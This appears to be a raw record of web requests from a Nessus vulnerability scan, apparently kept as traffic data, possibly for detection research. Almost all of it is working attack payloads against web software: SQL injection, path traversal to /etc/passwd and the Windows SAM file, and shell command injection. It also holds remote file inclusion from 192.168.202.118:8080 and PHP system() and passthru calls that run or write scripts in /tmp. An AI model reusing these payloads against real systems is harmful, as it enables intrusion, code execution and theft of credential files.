null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null-- /examples/jsp/jsp2/jspx/faq.php?action=&type=view&s=&id=-1' union select 0,1938145887,0,0,0,0,0-- /hjdzm96v.exe? /phpmyadmin//../../../../../../../../windows/win.ini\x00 /subscriptions.cfg /examples/jsp/num/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /cgi-win/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /j4drbkil.x? /cgibin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /javascript/nul.exe /scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1736489965-- /top.php?stuff="&ver\x09>q43482464&rem\x09 /zqqemp6j.nsf? /script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/tzhfyzkbomspvm? /javascript/jacob.exe /top.php?stuff='\x0dsleep 9 # /vac1l5vm.htm? /static//%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd /en-us/account/pwcgi/smpwservicescgi.exe?target=http://www.nessus.org /scripts/search.jsp?q=%" /azcrfs8d.asp? /qhvu0pdg.cfc? /js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js /main.php?stuff=';del q74863224 # /javascript/document.bak /en-us/n9xlumt5.do? /top.php?stuff="&rm\x0bq71858742&rem\x0b /...\...\...\...\...\...\...\...\...\winnt\win.ini /vac1l5vm.php? /sawmill6cl.exe?ho+{complete_version} /examples/servlets/servlet/awstatstotals.php?sort={${phpinfo()}}{${exit()}} /javascript/document.pl /javascript/site.exe /en-us/account/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1 /j4rdyhw8.jspa? ftp://192.168.25.102/* /phpmyadmin/index.php?id=urjhxcl19w' /i7prbs22.jsp? /? /cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc /listrec.pl?app=qmh-news&template=;ls /etc| /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/cgeqvnsxdv.sh+>+/dev/null+&'); function v /cgscripts/ /ybz5rz7a.idc? /help.php?q=ver;>q21957336&rem; /phpmyadmin/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd /xfkun1ku.html? /subscriptions.error /cacti/review.php?id=1&cat=&subcat="> /examples/jsp/sessions/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /? /e9rx3ya4.x? /demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/txenjrxf3?& /cgi-bin/profile.asp?handle=foo' /top.php?stuff="ver\x0c>q97119121&rem\x0c /scripts/forumdisplay.php?fid=21"> /if69ddo1.nsf? /main.php?stuff=";rm q18895618 # /scripts/event_view.php?eid=34 union select 1255940005 /top.php?stuff="&rm,q96325278&rem, /ywaxntrx.cgi? /0z575z74.do? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/ebkkxjvdvd.sh+>+/dev/null+&')."]=1 /help.php?q="ping -w 8000 -n 1 4.3.2.1|rem /javascript/automation.exe /edzaia0i.exe? /t578vqea.cgi? /examples/jsp/checkbox/nessus"> /javascript/document.ws /cacti/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd /5qnlm5z2.cgi? /script//ident/index.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /examples/jsp/checkbox/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00 /javascript/trackback.exe /javascript/was.exe /scripts/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\x00 /family_law_and_children's_rights/ /examples/jsp/jsp2/el/index.php?_language=../../../../../../../../../../etc/passwd\x00 /main.php?stuff=&ping;-w;9000;-n;1;1.2.3.4&rem; /if69ddo1.idc? /apache.php?command=c:\lockout_install.exe /recordings/index.php?src=1&_common=1&time=1331919010&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /recordings/index.php?template=../../../loudblog/custom/config.php\x00 /help.php?q=&uname >q14992919 # /en-us/account/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /components/com_mospray/scripts/admin.php?basedir=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=id /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/btgjhjkaao.sh'); function v /ghswfouu.x? /main.inc.php?pathtoscript=http://192.168.202.118:8080/2aibfaczmac8? /b1q8bywu.do? /examples/jsp/sessions/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../vtigerservice.php\x00 /cacti/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331905219','5'-- /javascript/.htaccess/"`false`" /javascript/menus.exe /fc9t54l7.mscgi? /scripts/cdjnwtwnqga1.php /0qhcnefz.asp? /help.php?q="del q96673282 # /fnwhrxyd.jspa? /top.php?stuff="&ping,-w,8000,-n,1,1.2.3.4&rem, /yomo-'the beginning' mixtape/ /ju0u7kfo.cgi? /mylog.html?screen=/etc/passwd /examples/jsp/cal/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd /snippetmaster/includes/vars.inc.php?_session[script_path]=@rfiurl?_session[script_path]=@rfiurl? /n1afe1y6.x? /6wb70v0b.cfm? /user's_faq/ /src/scripture.php?pageheaderfile=http://192.168.202.96:8080/4dckqcc0acprbz?? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+q+>>ctdn /scripts/qop0sa1auif9.html /linux-scripts/ /main.php?stuff="&ver\xa0>q28776765&rem\xa0 /javascript/index_1.exe /javascript/product.exe /examples/jsp/error/index.php?id=0rop9yeuxw' /jgs_portal_statistik.php?meinaction=themen&month=1&year=1' /javascript/htpasswd.db /examples/jsp/error/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_qshknabc]));die;/* /tuwjta1w.nsf? /examples/servlets/servlet/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00 /cgi-home/a1stats/a1disp3.cgi?../../../../../../../etc/passwd /order/login.php?svr_rootscript=http://192.168.202.96:8080/4dckqcc0acprbz? /top.php?stuff='&rm\x09q76524279\x09# /main.php?stuff="|ping;-w;7000;-n;1;4.3.2.1|rem; /examples/jsp/cal/index.php?template=../../../loudblog/custom/config.php\x00 /33y9gcqq.html? /manager/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /scripts/callboth.php?seq=654321&out=123456&in=1331908862@nessus\x0d\x0aasteridex_in_code_injection.nasl /h21y8w52.asp? /help.php?q="|sleep 9 # /cgi-bin/sawmill5?rfcf+"/etc/passwd"+spbn+1,1,21,1,1,1,1 /javascript/icons.exe /y8pmygrp.php3? /cacti/awstatstotals.php?sort="].phpinfo().exit().$a[" /scripts/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /examples/jsp/error/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /en-us/.htm index.html?../../../../../boot.ini /scripts/wxrdqnkjuwmu.pl /webdav/phprun.php?cmd=dir c:' /examples/jsp/error/search.cgi?..\..\..\..\..\..\windows\win.ini /examples/servlets/servlet/search/results.stm?indexname=>">&style=fancy&spage=60&query=folder name /main.php?stuff="&ver\x0c>q27346825&rem\x0c /activeauctionsuperstore/iteminfo.asp?itemid=42' /scripts/index.php?id='union/**/select/**/0,0,217622241,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /scripts/index.php?src=1&_common=1&time=1331923205&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /cacti/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /l13b77e5.nsf? /necro - morbid 12'/ /3m5knyc4.cgi? /b5xdqgz2.kspx? /cacti/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl /7o5qp766.php3? /top.php?stuff="uname >q83491369 # /sutherland-manuscript/ /awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/wrkvkjjzem0;echo|awstats138644.txt /e9rx3ya4.aspx? /m2fpztty.exe? /b4vng02k.exe? /606wkcop.aspx? /top.php?stuff="ping\x0b-w\x0b8000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /help.php?q="rm,q74835818&rem, /cgi-bin/htimage.exe/path/filename?2,2 /u8yiqilu.htm? /fa8p8lr8.mscgi? /scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/swgnhpydbq0t? /main.php?frm_daynight=q96287594&frm_passwd=&frm_referer=http%3a//192.168.23.202/main.php%3fstuff%3d2040844887&frm_user=&scr_height=&scr_width= /cgibin/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /help.php?q="&ping,-w,10000,-n,1,1.2.3.4&rem, /help.php?q="\x0arm q51358327 # /examples/jsp/cal/base_qry_common.php?base_path=/etc/passwd\x00 /examples/jsp/jsp2/jspx/awstatstotals.php?sort="].passthru('id').exit().$a[" /en-us/w4996nr0.htm? /examples/jsp/colors/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /v3axg1p8.exe? /mpcgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /um7xpn15.php3? /top.php?stuff='rm q76482731 # /help.php?q="ping\x0b-w\x0b9000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /top.php?stuff='\x0dsleep\x099\x09# /cgi/cgi-test.exe /0,2997,s=1626&a=12703,00/ /webcgi/testcgi.exe /cgi-home/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /phpmyadmin/lang/index.php?file=/etc/passwd /examples/servlets/servlet/calendar_admin.pl?config=|cat /etc/passwd| /news/include/createdb.php?langfile;=http://192.168.202.96:8080/4dckqcc0acprbz?? /she's so blonde/ /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332009306 /fmnveedu.kspx? /? /javascript/credits.exe /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/djjeroppey.sh+>+/dev/null+&'); function v /images_descriptions/ /g8nu2yy7.nsf? /cacti/index.php?template=../../../loudblog/custom/config.php\x00 /jnv890lt.html? /site/' union all select filetoclob('/etc/passwd','server')::html,0 from sysusers where username = user --/.html /women's health/ /en-us/account/index.php?p='nessus /help.php?q="uname >q82754698 # /daddy's worst nightmare 4/ / /forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini /examples/jsp/num/index.php?template=../../../loudblog/custom/config.php\x00 /javascript/guests.exe /help.php?q="&uname\x09>q13287114\x09# /cacti/ion-p.exe?page=c:\\winnt\\win.ini /help.php?q="&del\xa0q49941678&rem\xa0 /en-us/w4996nr0.pl? /zv8tv7h8.jspa? /t578vqea.dll? /scripts/shop.plx/page=nessus59680014 /help.php?q=ping;-w;8000;-n;1;1.2.3.4&rem; /javascript/directories.exe /examples/jsp/sessions/smpwservicescgi.exe /scripts/shop.plx/page=nessus244507043 /cacti/smpwservicescgi.exe /phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../vtigerservice.php\x00 /subscriptionrenewal/ /main.php?logout=ping;-w;9000;-n;1;4.3.2.1&rem; /rv98iwjp.fts? /vmi8bb12.htm? /examples/jsp/cal/includes/db_adodb.php?basedir=/etc/passwd\x00 /javascript/skins.exe /zv8tv7h8.jspa? /examples/jsp/cal/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl /mv8wxfy9.mscgi? /aoy7kzbh.exe|dir /phpmyadmin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc /index.php/\">< /en-us/oie504mr.kspx? /examples/jsp/checkbox/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /w4996nr0.do? /examples/jsp/jsp2/el/perl.exe?-v /fnwhrxyd.do? /cgi-exe/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /descriptor-objects/ //q59551631&q2217"q2217<q2217>q59551631 /y8pmygrp.aspx? /javascript/bboard.exe /examples/jsp/sessions/simple/view_page?mv_arg=|cat /etc/passwd| /dsweb/services/user-1"> /v3axg1p8.html? /cgi-sys/.passwd /hipkz026.do? /ht8pn8uq.cgi? /cgi-bin/viewpage.php?file=/etc/passwd /q703m78q.fts? /ju0u7kfo.pl? /examples/jsp/sessions/mapserv.exe?map=mapserver_detect.nasl.map /ygkjkngd.htm? /javascript/.bash_history.exe /javascript/htpasswd.temp /j2kdmfw4.php3? /u8yiqilu.nsf? /jscript4/ /cgis/gw5/gwweb.exe?help=bad-request /help.php?q='&uname\x09>q61993923\x09# /scripts/base_maintenance.php /1qwv2p5p.aspx? /examples/jsp/jsp2/el/index.php?post=../config/password /common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00 /javascript/computing.exe /vhzmaia2.aspx? / /cgi-sys/a1disp3.cgi?../../../../../../../../../../etc/passwd /cgi-915/.htpasswd /scriptv0106437/ /? /qhvu0pdg.nsf? /.aspx /5o9zq43e.asp? /t578vqea.cfc? /um7xpn15.cfm? /b1q8bywu.html? /jw64yq8u.cfc? /top.php?stuff='del\x09q19246858\x09# /examples/jsp/error/smpwservicescgi.exe /javascript/commercial.exe /e9rx3ya4.cfc? /egaet53a.pl? /manager/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd /javascript/ejb.exe /cacti/server.pt?open=space&name=";} /scripts/smb2www.pl /scripts/shops/sub.asp?isub=dupaypal_sql_injections.nasl' /b5xdqgz2.htm? /javascript/.htpasswd.sfish/8-7 /javascript/forums.exe /iktok2bw.exe? /cgi-bin/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00 /vwmg565s.exe? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+a+0+>>esbq /m5103snj.mscgi? /scripts/..\xc0/..\xc0/..\xc0/..\xc0/..\xc0/../winnt/system32/cmd.exe?/c+dir+c:\+/og /main.php?logout="ver\xa0>q91628118&rem\xa0 /examples/jsp/sessions/mmstdod.cgi?alternate_templates=| echo "content-type: text/html";echo "" ; id\x00 /en-us/account/www/delivery/ac.php?bannerid=-1331909226+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ifl_y2qb]));die;/* /examples/jsp/error/awstatstotals.php?sort="].passthru('id').exit().$a[" /index.php?show=../../../../../../../../../../../etc/passwd\x00 /process_description/ /top.php?stuff="&ping,-w,7000,-n,1,4.3.2.1&rem, /fmnveedu.cgi? //document.writeln(unescape("%3cscript src=%27http://www.example.com/test?rnd=q56134844%27><"+string.fromcharcode(0x2f)+"script>")) /scripts/1331921922-ror_session_fixation.nasl /d765w06j.dll? /igtf0zon.php3? /_vti_bin/cfgwiz.exe /cgi-bin/webdist.cgi?distloc=;id /gy23xnjq.htm? /javascript/05.exe /main.php?stuff=ver\x0b>q63867578&rem\x0b /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/bin/echo+-en+"\0174\0044\0000\0377\0347"+>>+/tmp/xdnhmjnjeg0;')."]=1 /en-us/s7qus4g3.jsp? /cgi-bin/php.cgi?/etc/passwd /0qhcnefz.cfm? /scripts/gdxlwjnlsr6i.shtml /ybz5rz7a.php3? //q54599877&q3916"q3916q54599877 /subscriptions.dll /w4996nr0.asp? /examples/jsp/colors/admin/admin.php?sid=' /a0imiuf1.cfm? /javascript/pricing.exe /scripts/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /fdscript/ /recordings/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st=' /javascript/callout.exe /examples/servlets/servlet/sawmill6cl.exe?ho+{complete_version} /y8pmygrp.fts? /cacti/directory.php?dir=;cat /etc/passwd /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ysytjpdzlh0+>+/dev/null+&'); function v /eei78ore.fts? /help.php?q="ver >q85487167&rem /cgi-exe/sawmill?rfcf+"sawmillinfo/sawmillpassword"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 /examples/jsp/cal/al_initialize.php?alpath=/etc/passwd\x00 /phpmyadmin/search.pl?form=../../../../../../etc/passwd\x00 /phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1\;id /scripts/tst.bat|type c:\winnt\win.ini /scripts/nffhikq061nq.cgi /cgi-exe/c32web.exe/changeadminpassword /en-us/account/base_local_rules.php?dir= /preview.php?php_script_path=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=dir /examples/jsp/error/starnet/addons/slideshow_full.php?album_name='925462004 ftp://192.168.27.202/* /bmeun223.do? /examples/jsp/jsp2/jspx/bb-hist.sh?histfile=../../../../../etc/passwd /kid's-r0/ /5o9zq43e.kspx? /cacti/claroline/resourcelinker/resourcelinker.inc.php?clarolinerepositorysys=/etc/passwd\x00 /help.php?q="&ver;>q83399542&rem; /include/sql.php?include_path=/etc/passwd\x00 /main.php?stuff="ver,>q37721326&rem, /ao22ww7y.cgi? /p043snfr.cfc? /scripts/news.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz?? /examples/jsp/colors/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini /recordings/zml.cgi?file=../../../../../../../../../../../../etc/passwd\x00 /m2fpztty.kspx? /lmw4r201.aspx? /scripts/printfaq.php?lng=en&pg=1 /b5xdqgz2.aspx? /tukodz3j.x? /examples/jsp/num/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00 /phpmyadmin/a1stats/a1disp3.cgi?/../../../../../../etc/passwd /scripts/starnet/addons/slideshow_full.php?album_name='769899449 /examples/jsp/checkbox/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /scripts/calendar.php?month=' union select 1,1,'1331919195','calendarix_month_sql_injection.nasl',1 # /passwdqc_random/ /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/bin/echo+-en+"\0174\0044\0000\0377\0347"+>>+/tmp/pxvobegahd0;')."]=1 /help.php?q="&del\x09q66374774&rem\x09 /0qhcnefz.html? /cacti/cvslog.cgi?file= /examples/jsp/cal/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00 /javascript/postgresql.exe /manager/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /examples/jsp/checkbox/sources/functions.php?root_path=/etc/passwd\x00 /manager/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /nuke/modules.php?name=network_tools&file=index&func=ping_host&hinput=;id /zroo33l4.cfc? /phpmyadmin/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00 /javascript/cgi-script.exe /main.php?stuff="&rm,q93432438&rem, /javascript/.passwd.xml /main.php?logout="\x0adel q86286812 # /..%2f..%2f..%2f..%2f..%2f../windows/repair/sam /esmozg5d.cgi? /examples/jsp/sessions/index.php?templates_dir=/etc/passwd\x00 /en-us/account/webadmin.php?show=/etc/passwd /examples/servlets/servlet/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold /phpmyadmin/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00 /javascript/dcforum.exe /ewc3rz1l.nsf? /phpmyadmin/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\x00 /169okeyj.x? /servlet/custmsg?guestname= /javascript/redirect.exe /examples/servlets/servlet/perl.exe?-v /dslpwt15.x? /phpwebsite/index.php?module=search&sea_search_op=continue&pda_limit=10\"> /m2fpztty.x? /cgi-bin/core/api.php?t_path_core=/etc/passwd\x00 /m5103snj.dll? /ssi/envout.bat?|dir ..\\..\\..\\..\\..\\..\\..\\ /zmvq66jy.html? /javascript/offices.exe /eg2u8pbv.x? /main.php?frm_daynight=q27938679&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width= /starnet/addons/slideshow_full.php?album_name='937923102 /scripts/base_local_rules.php?dir= /altercast/altercast?op= /pix_passwd/ /phpmyadmin/viewcvs.cgi/?cvsroot= /cgi-exe/query?mss=../config /psynch/nph-psa.exe?css=http://192.168.202.118:8080/ghl9il? /8t9v8k7x.pl? /phpmyadmin/index.php?cid=' /includes/phpdig/includes/config.php?relative_script_path=http://192.168.202.118:8080/moclyxlwqyfjnp? /scripts/tomcat_proxy_directory_traversal.nasl1331922105 /xsqln7eb.idc? /examples/jsp/num/includes/db_adodb.php?basedir=/etc/passwd\x00 /bl8sefdm.cfm? /d44uk9h2.php? /javascript/playing.exe /examples/jsp/num/index.php?gadget=glossary&action=viewterm&term= /en-us/7o5qp766.do? /cgi-local/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /scripts/index.php?board=nonexistant341477015 /top.php?stuff="rm\x09q66382972&rem\x09 /scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1071637599-- /javascript/traceroute.exe /0z575z74.jspa? /recordings/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc /zuihld5m.do? /u95h6ymu.do? /nessus\..\..\..\..\..\..\windows\win.ini /cgi-bin/bb-hist.sh?histfile=../../../../../../../../../../etc/passwd /examples/jsp/error/simple/view_page?mv_arg=|cat /etc/passwd| /main.php?logout="ping\x09-w\x099000\x09-n\x091\x094.3.2.1&rem\x09 /9o6g5vkn.htm? /? /cgi-bin/eboard40//index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00 /top.php?stuff="|ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09 /tukodz3j.cfc? /5o9zq43e.do? /g8nu2yy7.fts? /main.php?logout="ver\xa0>q51679818&rem\xa0 /hrttz9fj.cfm? /examples/jsp/colors/includes/converter.inc.php?include_path=/etc/passwd\x00 /h4bi26jd.fts? /help.php?q="&ver,>q46141422&rem, /t3af3tdz.jspa? /vac1l5vm.dll? /scripts/remotehtmlview.php?phpads_path=http://xxxxxxxx /forum1.asp?n=1753&nn=/....../boot.ini /men's_health/ /examples/jsp/jsp2/jspx/newsscript.pl?mode=admin /uvazfs7p.exe? /scripts/jammail.pl?job=showoldmail&mail=|id| /aoy7kzbh.exe /examples/jsp/error/cgiwrap/cgiwrap_error_page_handling_xss.nasl /;s=7;c=1013;a=1;l=1;p=20;sc=5661;n=0;b=16433/ /yef5f3d5.php3? /cgi-bin/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`; /main.php?logout=&ver&rem; /examples/jsp/colors/sawmillcl.exe?ho+{complete_version} /examples/jsp/cal/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /u95h6ymu.cfm? /examples/jsp/jsp2/el/mail.php?id='/**/union/**/select/**/1,2,1331904463,4--&blog=1 /sys/code/box.inc.php?config["sipssys"]=http://192.168.202.118:8080/ghl9il? /iv5vkgam.aspx? /actscript_icon/ /ap58k3ci.cgi? /9ko6m4c8.php3? /top.php?stuff="&del;q13316957&rem; /main.php?logout="|sleep 7 # /j734qobz.dll? /top.php?stuff="sleep 7 # /x7pclv4s.aspx? /examples/jsp/jsp2/el/docs.php?doc=../jpgraph-1.12.1/docs/index /en-us/oie504mr.asp? /recordings/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd /help.php?q='&del q89912813 # /scripts/sojourn.cgi?cat=../../../../../etc/passwd\x00 /qb2xy9aw.cfm? /examples/jsp/num/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /mylog.phtml?screen=/etc/passwd /main.php?stuff="\x0auname >q55324883 # /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php%3fstuff%3d1861731255&frm_user=q22572623&scr_height=&scr_width= /javascript/htpasswd.sql /parltranscript050704en/ /examples/jsp/jsp2/jspx/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login /recordings/search.pl?form=../../../../../../etc/passwd\x00 /d7ktpmcq.html? /shared_order.php?sharedplanid=1"><"1 /examples/jsp/jsp2/jspx/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /scripts/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\x00 /scripts/phpinfo.php /setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl /javascript/jbossas.exe /forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini //q47719336&q1431"q1431<q1431>q47719336 /nsn/..\util/send.bas / /bxnyrhmh.php3? /fo564rei.exe? /en-us/7o5qp766.exe? /include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd /webcgi/r.cgi?file=../../../../../../../../../../etc/passwd /dailyscripture_125x125/ /auktion.cgi?menue=../../../../../../../../../etc/passwd /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/iyeafeugpn0;'); function v /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- /index.php?c=access&a=login&ref_c=nessus">&ref_a=projectpier_login_page_xss.nasl"> /cgi-bin/lang/index.php?file=/etc/passwd /eei78ore.cgi? /r3le3om5.nsf? /scripts/irbf6nj7oyfh.php3 /examples/jsp/sessions/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'-- /help.php?q="rm,q99215968&rem, /vwmg565s.exe? /examples/servlets/servlet/session/login.php?dest=nessus">< /printsubscription/ /dda2qr7j.pl? /h5sc3gxy.cfm? /cgi-exe/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /main.php?stuff='uname >q73795897 # /javascript/htpasswd.class /cacti/search.pl?form=../../../../../../etc/passwd\x00 /smsmacscriptingapplication2/ /help.php?q="rm\x09q57557316&rem\x09 /raanw4ia.mscgi? /examples/jsp/checkbox/save.php?file_save=/etc/passwd /fmnveedu.cfc? /0qhcnefz.aspx? /examples/jsp/colors/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`; /en-us/9kr0ih0v.exe? /components/com_mospray/scripts/admin.php?basedir=@rfiurl?basedir=@rfiurl?&cmd=id /javascript/temp.exe /en-us/33y9gcqq.idc? /cgi-bin/admin/utilities_confighelp.asp?helpfield=-1') union select configval as confighelp from storeadmin where configvar='storeversion' or ('1'='2 /3j8echh0.kspx? /examples/jsp/sessions/port.php?proto=tcp' /phpmyadmin/index.php?id='union/**/select/**/0,0,1005650116,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /javascript/htpasswd.vbs /cgi-bin/al_initialize.php?alpath=/etc/passwd\x00 /ows-bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /en-us/7o5qp766.exe? /scripts/administrator/index.php /examples/jsp/colors/wa.exe?debug-show-version /javascript/v1.exe /examples/jsp/sessions/home/search.asp?nchannel='1 /qczkquis.nsf? /help.php?q="|ping\x0c-w\x0c11000\x0c-n\x0c1\x0c4.3.2.1|rem\x0c /cgi-sys/pfdispaly.cgi?../../../../../../../../../../etc/passwd /javascript/1997.exe /en-us/33y9gcqq.aspx? /books-manuscripts_w0qqlotrz1qqsacategoryz2195qqsocmdzlistingitemlistqqsocolumnlayoutz3qqsocustoverridez1/ /javascript/examples.exe /prescriptions_up/ /cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini\x00board=board_1 /cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331905235,4--&blog=1 /javascript/.passwd.do /main.php?logout='\x0drm\x09q42114986\x09# /en-us/fo564rei.mscgi? /javascript/tips.exe /j4drbkil.php? /top.php?stuff="del;q17781936&rem; /u8yiqilu.php? /en-us/jnv890lt.aspx? /opensourcescripting/ /manual/images/?c=m;o=a /index.php?dir= /o6ebbirj.asp? /main.php?stuff="&ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /index.php?user_langue=../../../../../../../../../../etc/passwd /main.php?logout="\x0asleep\x0911\x09# /main.php?stuff='\x0dsleep 9 # /javascript/procedures.exe /? /ghswfouu.php3? /en-us/w4996nr0.fts? /l752x1ry.cgi? /top.php?stuff='&uname >q77845858 # /main.php?logout="&ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /recordings/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}// /examples/jsp/num/viewpage.php?file=/etc/passwd /scriptpath/index.php?page=http://192.168.202.118:8080/moclyxlwqyfjnp? /script/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp /phpmyadmin/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl /examples/jsp/error/sawmillcl.exe?ho+{complete_version} /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.28.202/main.php&frm_user=&scr_height=&scr_width=q34842846 /nyvbv05h.x? /danny_o'brien/ /.cgi /main.php?stuff=;rm\x09q56931967\x09# /en-us/s7qus4g3.dll? /i7prbs22.nsf? /rbec2ohx.php3? /cgi-home/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /help.php?q="ping\xa0-w\xa011000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /l4fz1dqw.cfm? /help.php?q=&ver\x0b>q91825321&rem\x0b /en-us/account/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1 /j4oqyvga.fts? 